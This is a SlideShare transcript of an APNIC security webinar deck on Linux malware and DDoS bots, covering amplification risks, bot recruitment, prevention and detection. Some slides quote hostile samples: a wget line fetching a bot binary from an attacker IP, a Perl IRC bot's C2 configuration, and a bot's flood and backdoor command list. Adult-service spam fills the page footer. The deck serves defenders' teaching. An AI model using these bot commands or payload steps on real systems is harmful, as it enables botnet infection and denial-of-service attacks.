SlideShare una empresa de Scribd logo
1 de 17
Descargar para leer sin conexión
1
Linux Malware and DDoS Agent
Adli Wahid
Senior Internet Security Specialist
APNIC
1
2
Let’s Connect!
• Email: adli@apnic.net
• LinkedIn – Adli Wahid
• Twitter - @adliwahid
2
https://unsplash.com/photos/8ZxiJ03e5S4
3
Plan & Objectives
1. Share a different perspective on DDoS
2. Talk about DDoS Agents / Linux Malware
3. Observation from our Community Honeynet Project
3
4
Different Perspective of DDoS
4
My Network /
Infrastructure /
Host
Source
Target / Victim Perspective
Attacker Perspective
5
Victim / Target Perspective
• Availability affected
o System down
o Critical or not (what is affected?)
• Priority
o Business as usual
o Services not distributed
• Increase preparedness (or do nothing)
– Detection
– Incident Response
– Mitigation
• Investigation
– Actor
– Motive
– Attacker infrastructure
Source:
https://www.shadowserver.org/news/mi
rai-botnet-14-1-million-german-
customers-disrupted-liberia-taken-off-
line-and-now-the-culprit-has-been-
convicted/
6
Source of Attack Perspective
• How is attack organized ?
o We tend to see pieces of the puzzle (netflow,
front-end)
• How do attackers build their attacking
infrastructure?
– What tools are used ?
• Can we identify the attacker’s infrastructure ?
• Are we part of the attacker’s infrastructure?
– Can we detect or prevent this?
• Are we contributing to the DDOS problem?
6
7
Tool & Techniques
• Techniques
– Misconfigured services used for amplification attacks
o DNS, SSDP, NTP, Chargen etc
– Recruiting servers & IoT devices as bots
• Exploit known system vulnerabilities
• Exploit weak/default credentials (i.e. ssh / telnet) +
misconfiguration
• Use of Malware
– We hear more about Windows
– Targeting Linux servers and IoT devices to infect device
– ELF binaries or scripts (perl, bash, php etc)
– Device will receive instructions to attack
7
8
Vulnerable services
Mongolia
• Data from Cyber Green
Project
https://stats.cybergreen.net/country/mongolia/
• Challenge – how to deal with misconfiguration
of these services?
8
DDOS Potential
Open SNMP
Open DNS
Open NTP
9
Get reports about your network
• Shadowserver Foundation
o https://www.shadowserver.org/what-we-do/network-reporting/get-
reports/
• CyberGreen
– Download data : https://stats.cybergreen.net/download/
• Do it yourself
– Scan (Nmap)
– Use service such as Shodan.io
9
10
Linux/Unix Malware
• Routers / IoT devices / Servers run Linux /
Unix based OS
• Not new but interesting
– Targets are exposed on the Internet (http,
telnet, 23)
– Unpatched / Unmonitored (i.e. no Anti Virus)
– Default/Weak credentials
• Popular example – Mirai (ddos agent)
– Source code was shared publicly
• Simple technique of infecting and
spreading & persistence
10
11
source
Brute force:
Username: admin password:12345
Remote Code Execution via Web interface
Download Binary / Execute
Scan and gain access
Connect to Command and Control C & C
Bot “recruitment” process
11
wget http://37.x.2x.190:80/13747243572475/hx86_64
2
1
Attacker
12
my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircn
my $nick =$rircname[rand scalar @rircname];
my $server = '125.x.y.z';
my $port = '1947';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");
Perl Bot
13
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp
flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification
flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop
packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
* Source code
14
Preventing Infection
• Know your assets & customers
– Get reports from Shadowserver,
CyberGreen
– Use tools (nmap) or services like
Shodan.io
– Awareness of Vulnerabilities & Active
exploitation
• Secure / Harden Linux & IOT
Devices
o Access Control to services (brute
force)
o Remove / Harden services – DNS
resolver, NTP, etc
o Patch & Upgrade
14
https://otx.alienvault.net
www.virustotal.com
15
Detection
• Network based detection
– Policy – downloading of ELF / Binary
with certain user agents
– Brute force / telnet related activities
• Network Security Monitoring
– Netflow
– IDS/NSM – Zeek, Suricata
– Honeypots
• Awareness of threat landscape
– Go deep into malware research &
analysis
– Collaborate & share information – c&c,
infected host
• Forensics*
15
Detection with Suricata Rulesets
Fbot - Community Honeynet Project (2019)
https://securityaffairs.co/wordpress/96683/malware/linux-fbot-malware-analysis.html
16
More information
• APNIC blog https://blog.apnic.net
• APNIC Academy https://academy.apnic.net
16
17
Thank You!
o Email: adli@apnic.net
o LinkedIn – Adli Wahid
o Twitter - @adliwahid
https://unsplash.com/photos/foJms49Rrwc

Más contenido relacionado

La actualidad más candente

Nessus v6 command_line_reference
Nessus v6 command_line_referenceNessus v6 command_line_reference
Nessus v6 command_line_reference
Craig Cannon
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 

La actualidad más candente (20)

Enumeration
EnumerationEnumeration
Enumeration
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
St Louis Linux Users Group Wireguard (for Fun and Networking)
St Louis Linux Users Group Wireguard (for Fun and Networking)St Louis Linux Users Group Wireguard (for Fun and Networking)
St Louis Linux Users Group Wireguard (for Fun and Networking)
 
Blackholing from a_providers_perspektive_theo_voss
Blackholing from a_providers_perspektive_theo_vossBlackholing from a_providers_perspektive_theo_voss
Blackholing from a_providers_perspektive_theo_voss
 
Nessus v6 command_line_reference
Nessus v6 command_line_referenceNessus v6 command_line_reference
Nessus v6 command_line_reference
 
Ripe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigationRipe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigation
 
Nikto
NiktoNikto
Nikto
 
Suricata
SuricataSuricata
Suricata
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnology
 
The FatRat
The FatRatThe FatRat
The FatRat
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live Forever
 
BlueHat v17 || Disrupting the Mirai Botnet
BlueHat v17 || Disrupting the Mirai Botnet BlueHat v17 || Disrupting the Mirai Botnet
BlueHat v17 || Disrupting the Mirai Botnet
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
FastNetMon - ENOG9 speech about DDoS mitigation
FastNetMon - ENOG9 speech about DDoS mitigationFastNetMon - ENOG9 speech about DDoS mitigation
FastNetMon - ENOG9 speech about DDoS mitigation
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go
 
Intro to firewalls
Intro to firewallsIntro to firewalls
Intro to firewalls
 

Similar a IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and DDoS Agent

Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq Hanaysha
Hanaysha
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
tehkotak4
 

Similar a IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and DDoS Agent (20)

2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
 
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
Security Onion
Security OnionSecurity Onion
Security Onion
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Eradicate the Bots in the Belfry - Information Security Summit - Eric Vanderburg
Eradicate the Bots in the Belfry - Information Security Summit - Eric VanderburgEradicate the Bots in the Belfry - Information Security Summit - Eric Vanderburg
Eradicate the Bots in the Belfry - Information Security Summit - Eric Vanderburg
 
DDoS Threat Landscape - Ron Winward CHINOG16
DDoS Threat Landscape - Ron Winward CHINOG16DDoS Threat Landscape - Ron Winward CHINOG16
DDoS Threat Landscape - Ron Winward CHINOG16
 
Network And Application Layer Attacks
Network And Application Layer AttacksNetwork And Application Layer Attacks
Network And Application Layer Attacks
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq Hanaysha
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2
 
DDoS-bdNOG
DDoS-bdNOGDDoS-bdNOG
DDoS-bdNOG
 
Security concepts
Security conceptsSecurity concepts
Security concepts
 
lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptx
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 

Más de APNIC

Más de APNIC (20)

APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet development
 

Último

Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Chandigarh Call girls 9053900678 Call girls in Chandigarh
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
nirzagarg
 

Último (20)

Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298  )#  Call Girls in DubaiRussian Call Girls in %(+971524965298  )#  Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
 
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort ServiceBusty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
 
Microsoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftMicrosoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck Microsoft
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 

IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and DDoS Agent

  • 1. 1 Linux Malware and DDoS Agent Adli Wahid Senior Internet Security Specialist APNIC 1
  • 2. 2 Let’s Connect! • Email: adli@apnic.net • LinkedIn – Adli Wahid • Twitter - @adliwahid 2 https://unsplash.com/photos/8ZxiJ03e5S4
  • 3. 3 Plan & Objectives 1. Share a different perspective on DDoS 2. Talk about DDoS Agents / Linux Malware 3. Observation from our Community Honeynet Project 3
  • 4. 4 Different Perspective of DDoS 4 My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective
  • 5. 5 Victim / Target Perspective • Availability affected o System down o Critical or not (what is affected?) • Priority o Business as usual o Services not distributed • Increase preparedness (or do nothing) – Detection – Incident Response – Mitigation • Investigation – Actor – Motive – Attacker infrastructure Source: https://www.shadowserver.org/news/mi rai-botnet-14-1-million-german- customers-disrupted-liberia-taken-off- line-and-now-the-culprit-has-been- convicted/
  • 6. 6 Source of Attack Perspective • How is attack organized ? o We tend to see pieces of the puzzle (netflow, front-end) • How do attackers build their attacking infrastructure? – What tools are used ? • Can we identify the attacker’s infrastructure ? • Are we part of the attacker’s infrastructure? – Can we detect or prevent this? • Are we contributing to the DDOS problem? 6
  • 7. 7 Tool & Techniques • Techniques – Misconfigured services used for amplification attacks o DNS, SSDP, NTP, Chargen etc – Recruiting servers & IoT devices as bots • Exploit known system vulnerabilities • Exploit weak/default credentials (i.e. ssh / telnet) + misconfiguration • Use of Malware – We hear more about Windows – Targeting Linux servers and IoT devices to infect device – ELF binaries or scripts (perl, bash, php etc) – Device will receive instructions to attack 7
  • 8. 8 Vulnerable services Mongolia • Data from Cyber Green Project https://stats.cybergreen.net/country/mongolia/ • Challenge – how to deal with misconfiguration of these services? 8 DDOS Potential Open SNMP Open DNS Open NTP
  • 9. 9 Get reports about your network • Shadowserver Foundation o https://www.shadowserver.org/what-we-do/network-reporting/get- reports/ • CyberGreen – Download data : https://stats.cybergreen.net/download/ • Do it yourself – Scan (Nmap) – Use service such as Shodan.io 9
  • 10. 10 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but interesting – Targets are exposed on the Internet (http, telnet, 23) – Unpatched / Unmonitored (i.e. no Anti Virus) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly • Simple technique of infecting and spreading & persistence 10
  • 11. 11 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C Bot “recruitment” process 11 wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
  • 12. 12 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircn my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Bot
